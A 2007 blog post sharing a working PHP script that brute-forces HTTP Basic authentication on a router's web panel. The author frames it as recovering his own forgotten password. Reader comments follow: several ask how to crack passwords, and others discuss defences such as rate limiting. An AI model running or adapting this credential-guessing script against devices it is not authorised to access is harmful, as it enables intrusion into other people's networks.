I forgot the username and password to access the web panel of my router.
Luckily I knew some possible usernames and some patterns that I could have used to construct my password, so I just had to try all the combinations... Too much work to do manually but easily done when scripted.
Here is the PHP script that I came up with (obviously stripped of my personal stuff). It got my account in less than a second :)
DISCLAIMER: Don't use this code for anything illegal! I'm not responsible for what you do with this!
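<?php
// Device to check; fill these in for your own router.
$host = '';
$port = '';
$url = '/';
// Candidate usernames and passwords to combine.
$users = array();
$passes = array();

// First one request without credentials, then every user/password combination.
tryme($host,$url,$port);
foreach($users as $user) {
    foreach($passes as $pass) {
        tryme($host,$url,$port,$user,$pass);
    }
}

// Run one attempt and print its outcome.
function tryme($host,$url = '/',$port = 80, $user = null,$pass =null ) {
    $result="FAIL";
    if(tryAccess($host,$url,$port, $user,$pass)) $result="SUCCESS";
    if($user && $pass) $userpass = "user $user pass $pass ";
    else $userpass = " without username & password";
    echo("Tried $userpass > $result\n");
}

// Send one request, with an HTTP Basic Authorization header when credentials
// are given. Returns false if the reply contains "401 Unauthorized".
function tryAccess($host,$url = '/',$port = 80, $user = null,$pass =null) {
    // $errno and $errdesc are filled in by fsockopen(); call-time
    // pass-by-reference (&$errno) is a fatal error on PHP 5.4 and later.
    $fp = @fsockopen ($host, $port, $errno, $errdesc);
    if (!is_resource ($fp)) {
        echo("Could not open socket to server: $errno - $errdesc\n");
        return false;
    }
    @fputs ($fp, "POST $url HTTP/1.1\r\n");
    @fputs ($fp, "Host: $host\r\n");
    @fputs ($fp, "Connection: close\r\n");
    if($user && $pass) {
        @fputs ($fp, "Authorization: Basic " . base64_encode ("$user:$pass") . "\r\n");
    }
    @fputs($fp,"\r\n");
    $reply = '';
    $success = true;
    while (!@feof ($fp)) {
        $line = @fgets ($fp, 1024);
        // strpos() returns 0 for a match at the start of the line, so compare against false.
        if(strpos($line,'401 Unauthorized') !== false) $success = false;
        $reply .= $line;
    }
    @fclose ($fp);
    return $success;
}
?>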
Posted on Wednesday, 28 Nov 2007 22:11 - tags: php - 32 comments
Posted by Lieven on Thu Nov 29 03:32:30 2007
Yes, my router has a password reset functionality, but then I would need to search my null-modem cable (because it's via a serial interface), go downstairs, connect my laptop, figure out the serial settings ( I always forget them), ...
It's so much more fun to leave my laptop and lazy ass where they belong and hack a script together and learn something from it :-)
About the brute force protection, it seems like it doesn't have any, which is okay for me since it only listens on the LAN (and runs on a custom port).
Posted by Dieter_be on Fri Nov 30 09:13:00 2007
I just found out there is a new version of the software which supports doing a full reset triggered by a hardware button, but then I lose all my settings (which I can restore because I have backups :-) but this would also mean my internet connection has to go down for a while ...
And my initial point - the coolness factor and the educational value - remains ;-)
Posted by Dieter_be on Sat Dec 1 11:14:00 2007
Hey, sorry I'm being a bit thick, how would you modify this to work to crack your passwords?
Please explain a little?
Thanks,
Dan
Posted by Dan on Thu Jan 3 20:42:22 2008
The key is filling the $users and $passes arrays ( or if they are really big then change how the looping works so you don't waste your ram )
Posted by Dieter_be on Sat Jan 12 05:46:27 2008
I recently had the same sort of problem. My router is inside a sort of hole in my roof, and I forgot the password. I haven't needed to access it for any reasons lately, but it would be nice to get back in. I have NO idea what it was. So is there a way for it to just test all possible solutions but having it connect together letters from the alphabet?
Also how do you use this script?
Posted by Anonymous on Mon Apr 14 12:53:49 2008
what router do you use?
Posted by Anonymous on Sat Jul 12 12:38:50 2008
It's a little embedded box, based on the pc engines WRAP 1E-2 board, running m0n0wall. (but this trick works on any device that uses http authentication)
@ the other anonymous commenter: it's a php script. save it as a file and run it as
php filename.php
Posted by Dieter_be on Mon Jul 14 16:06:42 2008
Could you tell what to change for the passes Array()? I don't fully understand php, but I do wanna access my router again!
Posted by Anonymous on Sat Nov 29 08:34:27 2008
ya dude...
how do u actually use the script
Posted by Anonymous on Sat Dec 27 13:49:22 2008
Anonymous 1: Well I don't know how you construct your passwords... whether you use a fixed string, a random one, a combination thereof etc. You obviously need to know a little php.
Anonymous 2: Run it from the php command-line. (/usr/bin/php)
Posted by Dieter_be on Tue Dec 30 09:11:31 2008
The password losing cases are common when you just tend to forget your password. In the scenarios where you use the login frequently you tend to remember but when you have a break for many days you need to have it written somewhere.
Also I have realized pre storing the password for logins is not really a good idea, as you just keep logging in because the system knows the details but due to any reason if you are required to retype it, it is a problem.
my experience with passwords.
Posted by Medical Terminology on Tue Mar 3 05:35:13 2009
I was wondering if a hacker or any of my assistants could use this to get into my router, I have not provided them the access due to critical information but always be concerned if I am safe with my router?
Posted by Animaroo on Mon Mar 30 05:05:18 2009
Thanks for sharing was very useful.. I run a web company and have many routers to handle.
Posted by Vancouver Website Design on Sun Apr 5 05:33:40 2009
I think you shouldn't have shared this script.. the script might reach the wrong hands.. :(
Posted by Credit card Applciation on Sat Jun 6 00:23:44 2009
That's a bit worrying how easy it could be to hack into other people's routers. Any advice on how to make it more secure?
Posted by Quadrant vans on Wed Jun 24 06:11:55 2009
1) rate limiting: only allow max 4 requests in a 5 minute time span or so.
2) if you only login from one of the networks (eg the LAN), only expose the interface on the relevant subnet/port.
Most consumer routers support option 2, but not option 1.
Posted by Dieter_be on Sun Jun 28 09:28:09 2009
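Option 1 from the comment above, sketched as an added example (not code from the post, its comments, or any router firmware): a sliding-window limiter that sits in front of an HTTP Basic check and answers 429 once a client IP has 4 failed logins inside 5 minutes. The class and function names, the credentials and the IP address are constructed for illustration; it counts failed logins rather than all requests, and an unauthenticated first request is challenged without being counted.

```python
import base64
import hmac
from collections import defaultdict, deque

MAX_FAILURES = 4       # "max 4 requests" from the comment above
WINDOW_SECONDS = 300   # "in a 5 minute time span"

class BasicAuthLimiter:
    """Sliding-window limit on failed HTTP Basic logins, keyed by client IP."""
    def __init__(self, username, password):
        self._expected = f"{username}:{password}".encode()
        self._failures = defaultdict(deque)  # ip -> times of failed logins

    def handle(self, ip, authorization, now):
        """Return (http_status, retry_after_seconds) for one request."""
        window = self._failures[ip]
        while window and now - window[0] >= WINDOW_SECONDS:
            window.popleft()  # forget failures older than the window
        if len(window) >= MAX_FAILURES:
            # Reject before checking credentials, so a correct guess made
            # during the lockout is indistinguishable from a wrong one.
            return 429, int(window[0] + WINDOW_SECONDS - now)
        if authorization is None:
            return 401, 0  # browser's first request: challenge, don't count
        if self._credentials_ok(authorization):
            return 200, 0
        window.append(now)
        return 401, 0

    def _credentials_ok(self, authorization):
        if not authorization.startswith("Basic "):
            return False
        try:
            supplied = base64.b64decode(authorization[6:], validate=True)
        except ValueError:
            return False
        # Constant-time compare: no timing hint about how much matched.
        return hmac.compare_digest(supplied, self._expected)

def basic(user, password):
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()

def replay():
    """Constructed traffic: four wrong guesses, then the right password."""
    limiter = BasicAuthLimiter("admin", "correct-horse")  # constructed values
    guesses = [(0, "a"), (1, "b"), (2, "c"), (3, "d"),
               (4, "correct-horse"), (301, "correct-horse")]
    return [limiter.handle("192.0.2.10", basic("admin", pw), t)[0]
            for t, pw in guesses]
```

The fifth request carries the right password and is still refused, which is what makes the limit effective against a guessing loop; the same login succeeds once the oldest failures age out of the window.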
Can you give me a step by step on how to hack into a router.
I am new at this and I would like to learn.
Thanks
Posted by A.C. on Sun Sep 6 15:25:03 2009
Losing your password is common. I realized that storing the password for logins is not a good idea, as you just keep logging in because the system knows the details, but if for any reason you are required to retype it, this is going to be a problem.
my 2 cents about passwords lost.
Posted by Vanessa Rousso on Sun Nov 8 22:27:37 2009
for those who can't understand this...
$users = array('admin','admin2');
$passes = array('password','password2');
etc....etc...
Posted by Anonymous on Sat Jun 5 03:38:25 2010
How do you actually put this script into effect? What do I need to do with the script in order to activate it and crack the password and username?
Posted by Anonymous on Thu Jul 29 01:52:07 2010
On most (if not all) routers, there's a way to reset it to factory settings though. For routers that have defense mechanisms against brute force attacks (why doesn't yours?), that's the only way to do it.